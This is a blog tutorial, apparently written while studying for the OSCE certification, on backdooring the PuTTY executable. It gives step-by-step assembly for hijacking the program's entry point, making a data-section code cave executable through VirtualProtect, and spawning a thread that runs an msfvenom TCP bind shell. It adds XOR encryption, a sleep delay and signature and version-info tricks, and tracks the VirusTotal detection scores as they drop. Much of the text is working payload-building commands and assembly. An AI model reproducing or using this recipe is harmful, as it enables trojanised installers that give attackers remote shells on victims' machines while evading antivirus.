Getting really low :: Backdooring an EXE
So recently I started my OSCE and part of it is backdooring an executable and doing some other things. There are loads of guides on the interwebz that basically just regurgitate the course content verbatim and claim it as their own. I won’t provide links but trust me, they are out there. These sites / blogs also tend to skip over really useful points and I hope that I manage to document a good solid process here.
So whats the aim here?
In a nutshell we are going to make some shellcode (whilst letting MSFVenom and some Metasploit source do the heavy lifting). This shellcode will be a TCP Bind payload, not the TCP Reverse TCP that’s already documented to death on the internet. We will stash this shellcode in the Putty executable and divert Putty’s genuine execution to the shellcode and then fix it all back up and divert back to the legitimate code.
A TCP Bind payload has the annoying limitation that it will block the process until the attacker connects. To get around this, we will need to create a new thread to run this part of the payload. We will also try and encrypt the payload so we can evade some AV but this is expected to be fairly ineffective.
Here we go…
Prepare the environment
Metasploit Framework: Easiest approach is to download the Kali Linux iso and install it into a VMware Workstation VM.
Not so fast. First off there is a decision to be made and that is should we find space for our malicious content or create space… Creating space is much easier but can (supposedly) trigger AV as its a bit unusual to bolt on extra segments to an executable, so an existing big block of null bytes is preferred. To test this, lets check the AV detection rate for the vanilla putty executable with VirusTotal.com and then modify the binary by adding a big block of null bytes to the end and check it again. If you haven’t done this before it is as simple as browsing to VirusTotal.com and uploading the executable.
Putty scores 0/61, as expected.
Now we will add a new section to the executable with LordPE and HxD. To do this, take a copy of the exe and then launch LordPE. All being well we should have a “PE Editor” button on the right hand side which when clicked will launch a file dialogue for selecting our copy of Putty. After selecting the exe a new dialogue appears with a lot of field I won’t pretend to understand, the important bit is clicking the sections button on the right hand side. Both of these buttons can be seen in the screen below:
In the sections dialogue, we need to right click the last section and add a new one. We will then right click the new section and edit it so it has a VirtualSize and RawSize of 1000 bytes. This is in hexidecimal, so we are basically saying this section will have 4096 bytes of actual data in the file and on execution the system should give the section 4096 bytes of memory.
The screens below cover this, I have renamed my section to .Simon.
With this done, close the section editor and click “Save” and “OK” in the previous dialogue (just visible in the “add section” screen above).
Before we leave LordPE, make sure to use the “Rebuild PE” function by clicking the button on the right and then selecting our file again.
The next step is to open the executable and actually add the extra 4096 bytes of data that we have configured to be there. This is easy enough with HxD so launch it and open the newly modified executable. Within HxD, we scroll down to the very last byte and click it so that our cursor is blinking within it and then add 0x1000 (4096) bytes of 00’s to the end. Hopefully the screens below cover that should you need to see it.
Once we have added these extra bytes we will need to save the file and use LordPE again to rebuild the executable with the “Rebuild PE” function just as we did before. Saving the file in HxD should change all those Red 00’s to black.
After all of this, we should have a new putty executable that still runs but which has 4096 bytes of executable memory that we can store shellcode in. So, will it still score a zero on VirusTotal? There is nothing malicious in the file yet…
Well that answers that question!
So the next thought is can we find somewhere within the existing sections that could hold our malicious shellcode. Within LordPE we can view the flags configured for a section and we will need both execute and write permissions for this backdoor. This as a self-decrypting payload and therefore will need to execute and wrtie the decrypted code back into memory. We can view the flags for each section by editing the section in LordPE and then clicking the “…” next to the flags field. Most of this is covered in the next screen.
The text field looks most promising as it already has execute permissions but unfortunately does not have write permissions. We can change this by simple ticking the “Writable” box and saving the changes back to the executable but immediately we find…
Okay so we can’t make the text section writeable, at least not via the PE header. We could make it writeable after the program has begun by using the VirtualAlloc function though so it’s not the end of the road just yet. The other option is making the .data section executable as that already has write permissions. This is again done with LordPE in the same manner so it is worth seeing how doing this effects the detection rate on VirusTotal. Unfortunately it is much the same, but if the providers listed aren’t a problem then maybe you could just go with this simpler approach?
Firing up Immunity Debugger
The next step is to look for somewhere to store our payload. Hopefully we can squeeze it all in the text section as it is executable so we only need to worry about making it writeable. If we can’t do this, we can hopefully squeeze in a STUB that will make an area of the data section executable so we can store our payload there and then jump to it from the end of the STUB.
There are tools for automating this search, but we can do this ourselves by launching putty in the Immunity Debugger and looking for big blocks of null bytes (00’s). To do this, launch Immunity Debugger (as an admin) and open the Putty executable. When the activity stops in Immunity we have to press the play button once to tell Immunity to pass the first exception (not sure why it is even there?). Immunity will automatically pause at the programs main entry point, which is where we want to hijack the code execution. If you want to hijack an executable at a custom point, say when a particular event occurs or button is clicked, you should pause the program there to ensure any caves you find are still caves at the point you need to use them. To check if we are at the program entry point, keep checking the log window (view>log) as it should read “Program entry point”.
Ok so now we are at the program entry point and this is where we want to divert execution from for our payload before eventually directing execution back to. This means we need to be able to set everything back to normal before we return the execution flow. In Immunity, go to view>memory and find the text section of putty in the list. Double clicking this section will open up a new window showing its raw instructions. We are looking for a big block of null bytes (00’s) which you can see right at the end of the memory. Unfortunately this cave isn’t too big but we can use it host a little bit of code which will make one of the larger caves in the data section executable.
To begin, lets get a memory address from the start of this short code cave so we can redirect the execution flow to it. We can run the command “!mona modules” to show all the loaded modules and some useful information on them, in this case lets see if Putty uses ASLR.
As we can see, all modules except Putty utilise ASLR. This means their memory addresses (or at least the first byte) will be randomised every time they are reloaded (system reboot). Fortunately Putty wasn’t compiled with support for this so we can use fixed memory addresses when referencing memory locations.
Ok, so the memory address chosen in my case is 0045CF87. At this location we should right click the null byte and select assemble from the pop up menu. Type INT3 here for an interrupt instruction and click assemble. If our redirect works, the program should pause here because of the interrupt instruction we have put in the memory address. At this point, its probably worth saving this back to executable and restarting it.
To do this, we need to find our instruction in the CPU window so either find that window or go view>CPU. When there; scroll right down to our INT3 instruction, right click it and select “Copy To Executable>Selection”. A new window will open, close it off and follow the save prompt to save a new copy of Putty. With this done, use the open dialogue within Immunity to launch the new version of Putty. From this point on, I’ll just say we should save our changes so nip back here if you need to.
So hopefully we are back to the main entry point and we should see the first three instructions as:
PUSH 60 // 6a60
PUSH 00478108 // 6808814700
CALL 00457204 // e808210000
I have included the byte values of those instructions to show an important point. If we overwrite the first instruction with an instruction that consumes more than 2 bytes we will overflow and break the following instruction. For this reason we will overwrite the second instruction rather than the first. The instruction we want is a jump to our interrupt, so right click the PUSH 00478108 instruction and select assemble. This time we will insert the command “jmp 0045CF87” and assemble it. If this worked, hitting the play button should allow the execution to run but pause once again once it hits our interrupt command. If it worked, go back to where you swapped the PUSH for a JMP and save a copy of the executable.
From now on I’ll document the instruction we will use, but its up to you to assemble them into the binary.
Eventually we will be using shellcode from Metasploit to deliver the TCP bind shell so we need to make sure we can save the current state of the CPU stack and flags so they can be restored after all the malicious stuff has happened. Sometimes this might not be necessary but it’s always best to tidy up. The method that we will use to do this is to save all of the registers and CPU flags to the stack, then save the stack pointer to memory. For this we will need 4 bytes of writable memory so go look for one in the data section. I’ll go for 0047B090.
So now, rather than jumping to an interrupt, we will jump to our backup and restore code which will use the assembly commands below. I’ll use “//” to denote comments, don’t assemble that bit!
PUSHAD // Push register values to the stack
PUSHFD // Push CPU flags to the stack
MOV [0047B090],ESP // Copy ESP value into the writable memory address we found in the data section
NOP // 5 instructions that do nothing which we will use later on
MOV ESP,[0047B090] // Copy the saved ESP value back into ESP
POPFD // Pop the CPU flags from the stack
POPAD // Pop the registered from the stack
PUSH 00478108 // This is the command we overwrote to jump here from the entry point
JMP 004550F7 // JMP to next instruction after the one we overwrote.
Okay so now we have a Putty that is pretty broken, so lets fix it and make sure what we have done so far isn’t flagging with AntiVirus. The reason Putty now generates an error is because we have broken something by saving our stack pointer to the memory location. We could look for another and try again or just ensure we wipe it clean when we are done.
To wipe it clean, we can use another instruction before the final jmp:
MOV DWORD [47B090],0 // We specify DWORD here so it fills all four bytes. We are basically moving “0” to those four bytes.
In Immunity, you should see your code looking a lot like the screen grab below.
With this tweak, Putty should launch as normal and we have our backup and restore code in place.
This post was never meant to be about evading AV but it kind of goes hand in hand with backdooring an executable so I don’t think its is appropriate that we ignore it. Annoyingly, somehow these amendments trigger 6/61 AV engines on VirusTotal. This really threw me so I started playing around and these engines still detect even if we remove all of the instructions so we just jump down and back up.
Frustrated by this, I swapped the jmp instruction for a call instruction which makes it a touch more complicated as we have to correct the stack from the call instruction. For reference I have included this bit of code below but alas it didn’t make any difference to our detection rate!
MOV DWORD [ESP],0047810 // overwrite the automatic return address with the value that needs to be on the stack
PUSH 004550F7 // Push our return address back to the stack
RETN // Return to the address on the stack, which pops it off and leaves the stack how it needs to be
My next thought was to strip the (now broken) digital signature from the file in case that was being used by the AV engines. Doing this increased our detection rate to 11/61! The world of AV is definitely a strange one and it looks like having a broken digital signature is better than none at all. Rebuilding the PE in LordPE dropped the detection rate down to 10, so there is something in the section headers causing (at least some) of the problem. Then again if we use LordPE or CFF to rebuild the headers on our original signed Putty the detection rate jumps straight back up to 11! Growing ever frustrated, I took the original vanilla putty and rebuilt the PE and that scored 7/61!
Switching back to the original putty and reapplying our modifications without rebuilding the PE header brings the detection rate down to 5/61. Looks like we will have to settle for this right now but feel free to drop something in the comments if you know of a way of getting the detection rate even lower!
OK, lets move on. Now we need to find a nice big block of zeros in the data section that we can use to hold our payload. I’ll Cleave this as an exercise for the reader as we have already done it once. I found a nice block starting at 0047CC00 which gives us just short of 1000 bytes (hex or 4096 in decimal) all the way up to 0047DC00. As discussed earlier, this is a writeable but not executable block of memory so we need to fix that. This can be done with a call to the VirtualProtect function in Kernel32. How do I know this, because I googled it obviously!
There are a number of complicated ways to find the address of the VirtualProtect function (remember it moves around a lot because of ASLR). We won’t be using them. We won’t need to.
Mona has a command called ropfunc which will automatically find references to known useful functions in none-ASLR memory addresses. We know that Putty is compiled without support for it so if it has a pointer to VirtualProtect then we can just use that to make our call. Running the command returns exactly what we need.
When we get the pointer (0045d194) we restart Putty a few times to make sure its a genuine static reference. It is, so we have the location of VirtualProtect!
With this we can build our code to call VirtualProtect and make our second cave in the data section executable. To do this we need to know what parameters VirtualProtect requires so we can push them onto the stack in (right to left) order and make the call. To find these, Google it! (Linky)
Hopefully you read that MSDN article. It doesn’t matter if you couldn’t quite understand it as I’ll document it here. Remember, we are working right to left.
lpflOldProtect [out] :: This is a pointer to an address where the return is stored. If we don’t provide then the function will fail. We can get an address on the stack by making some room on it and then taking the address from the ESP register.
flNewProtect [in] :: This value determines the permissions granted to the code cave we are changing.
dwSize [in] :: This value determines how many bytes from the start address will get modified.
lpAddress [in] :: This is the start address of the code cave.
So lets put the code together:
push 0 /// Somewhere to save return code
push esp /// Push esp address which is where 0 is
push PAGE_EXECUTE_READWRITE // Push param saying make rwx
push 1000h // Push 1000 (hex) so 4096
push 0047CC00 // Push start address
CALL DWORD PTR DS:[45D194] // Call virtualProtect
pop EAX // pop the return off the stack
JMP 0045CF94 // JMP to our restore code and on to Putty
If we put a breakpoint on the final JMP, we should see the stack after the VirtualProtect function has returned.
As we can see, the top DWORD of the stack is the number 8. So 8 was returned by the function call to VirtualProtect. MSDN tells us that the function (if successful) will return the code matching the permissions the code cave had before the change. So what does 0x(00000)08 mean?
Looks probable to me! Lets take a quick look at VirusTotal and see how we are getting on…
Cool, no change there then.
And for reference, your shellcode should be looking a little something like this…
To test this has worked, lets add a jump instruction to send execution to our new executable data code cave and then just jmp straight back to test execution.
Hopefully you can work out these two jump instructions now so I won’t document it here! For info, it works like a charm.
So now we have the shellcode that saves our current state, makes another writeable code cave executable, then puts everything back together and carries on to launch Putty as normal. Now for the malicious stuff!
As mentioned before, we will be using the TCP Bind payload from Metasploit so will need to create a new thread to hold the payload. I found this out through trial and error so if you want you can go on the same journey of discovery by skipping the next section.
Spawning a new thread
The shellcode for this is a little complicated as there are no usable pointers returned by !mona ropfunc. Instead we will generate the thread spawning shellcode with Metasploit. To this, we need to locate where the source code files are in Kali (or BackTrack) and then build the shellcode. To find the source code, run the command:
locate .asm | grep thread
This should output some file paths, we need to change directory into the x86 folder which contains the python build script. For me thats:
Once there we can generate the shellcode with:
python build.py createthread
With this done, you should get your shellcode.
To make this more usable, lets strip out all the characters we don’t want to leave just the binary hex. I won’t explain the ins and outs of the grep, sed and tr commands but it will leave a string of binary for us to copy and paste into the ImmunityDebugger.
python build.py createthread | grep ‘”‘ | sed ‘s/[^A-Z0-9]//g’ | tr -d ‘\n’
For me, the shellcode was returned as:
To paste this into Immunity, find you way to the .data section code cave and select a good number of lines (100 or so) and then right click and select Binary > Paste. If you find the shellcode goes right up to the end of the selection then you have probably truncated it. Right click and select Binary > Fill with 00’s and try again.
Once this is pasted in, we should see all the instructions. Take a moment to try and orientate yourself to some of this code. Its a good idea to add a breakpoint to every call instruction and just after it so you can run the code and keep breaking at important bits.
The last 2 instructions are a return and pop eax, both of which we don’t need as we are jumping here and not calling the code. We can fill these back with 00’s and assemble and instruction to jump back to our restore code.
Now to work out how this shellcode is creating a thread. There is no easy way to do this other than place some breakpoints and run through the code. What I find is often useful is putting breakpoints immediately after a call instruction and after the conditional jump of a loop. This one is definitely useful as quite often a loop can go for hundreds of iterations!
After a while you will land on the JMP instruction to Kernel32.CreateThread. So rather than call this function, the stack of parameters is manually put together by the shellcode and a jmp instruction is issued instead. We can see the parameters on the stack in the screen grab below.
At the top of the stack we have our return address for the function (which we can swap out with a fixed address to our restore code) and then a couple of DWORD 0’s and a memory address 0047CCA6. As it happens this address pointed to the pop eax instruction we overwrote earlier so this must be the new threads start memory address. Hopefully this is starting to make sense now. This shellcode is designed to be called so that everything after the end RETN instruction (that we overwrote) is launched in the new thread! Well modifying the shellcode may help with AV evasion so lets continue on this path.
Looking at the instruction, we can see that there are some push commands that assemble what looks like the stack we see on the right hand side. Key to this is the lea command which determines the start of the new thread by calculating an address with an offset from ebp. We can swap this with a push instruction that will put a fixed address onto the stack.
I went for:
With these changes in place, we see that we have a new thread with an entry point at 0047CCB0! Putty is also broken if you try and launch it but that is because our new thread bins out. We are also up to 11/61 on VirusTotal so let’s try and throw some shellcode in and see how we get on.
Before we proceed, your code should look something like this:
The bind payload
We will generate the shellcode with the command:
msfvenom -p windows/shell_bind_tcp EXITFUNC=THREAD | grep ‘”‘ | sed ‘s/[^a-f0-9]//g’ | tr -d ‘\n’
Then just like before we will copy and paste it in, starting at 0047CCB0.
With that pasted in and saved, launching the executable presents us with…
Success! But how about VirusTotal?
I don’t think that’s too bad really, we avoid some of the big players like Sophos, Kaspersky, Comodo, Eset, McAfee, Symantec, Panda. But can we do better?
Well the next day I ran the same scan and it scored 31/61! Just goes to prove the danger of using VirusTotal and getting your binaries distributed to the AV vendors. If we then use ResHacker to modify the file attributes (Version, ProductName etc) then we bring the score back down to 17/61. Some providers are still detecting that bind shell though so we need to try and obfuscate it.
To do this we can encrypt it by XORing the code cave we created in the data section and creating some decryption code in the text section. If we didn’t have room in the text section, we could put the decryption code in the data section but we do and its tidier doing it this way. This sounds more complicated than it is. I’ll just jump straight into some example code.
MOV EAX, 0047CC00 // Move the start address of our code cave into the EAX register
XOR DWORD [EAX], DEADBEEF // XOR the memory address referenced by the EAX register with the bytes DEADBEEF’
INC EAX // Increment EAX 4 times as we XOR’d 4 addresses with the XOR DWORD
CMP EAX, 0047CE03 // Compare EAX with the address for the end of our malicious code
JLE 0045CFD0 // If we aren’t past the end our cave, jump back to the XOR command and go again
JMP 0047CC00 // If we didn’t do the JLE (because EAX is now high enough) jump to our data code cave to being execution
So we are using EAX as storage for the individual 4 bytes of memory that should be encrypted. We encrypt those 4 bytes and then increment EAX by 4 bytes so it points at the next address. If this new address is before the end of our code cave, go back and loop again otherwise jump to the code cave that is now fully encrypted.
Once this is in and working, you want to put a breakpoint on the last jmp intruction and when you get there save the encrypted .data section. Restart the application and the encryption code will now decrypt the shellcode and execute it. This is a trivial encryption using a symmetric key, so encryption and decryption can both be done with the same code.
That brings us down to 15/61!
At this point I suspect we are triggering heuristic checks which are basically running Putty and waiting for the bind shell to execute. To counter this, we will introduce a short sleep before the payload triggers. Now I couldn’t find any pointers to KERNEL32.Sleep so I just assembled the command CALL KERNEL32.Sleep which isn’t ideal and probably makes this OS specific. There is shellcode out there to address this problem but I didn’t want to go down that rabbit hole just yet.
So to call KERNEL32.Sleep we first need to push the number of milliseconds, we want it to wait, to the stack. I went for 0x1000 which is 4096 or just over 4 seconds. So the full code for assembly looked like:
I put this after the decryption STUB but before the create thread shellcode. As our create thread shellcode didn’t flag AV, it could sit after it and not delay the rest of the application but that was a lot of moving code around and I really wanted to wrap this up! So whats the scores on the doors?
Not bad, and I must say I’m impressed with AVG for its detection rate throughout this process!
Again, if we strip that (invalid) digital signature out then the score climbs back up to 11. So top tip there, keep dodgy broken signatures in place!
Well I hope you learnt a lot there about shellcoding and I haven’t missed little bits out that really mean a lot. My aim here was to provide a good solid well reasoned guide that anyone can pick up, follow and (importantly) understand why we make certain decisions along the way.
Any feedback, drop it in the comments.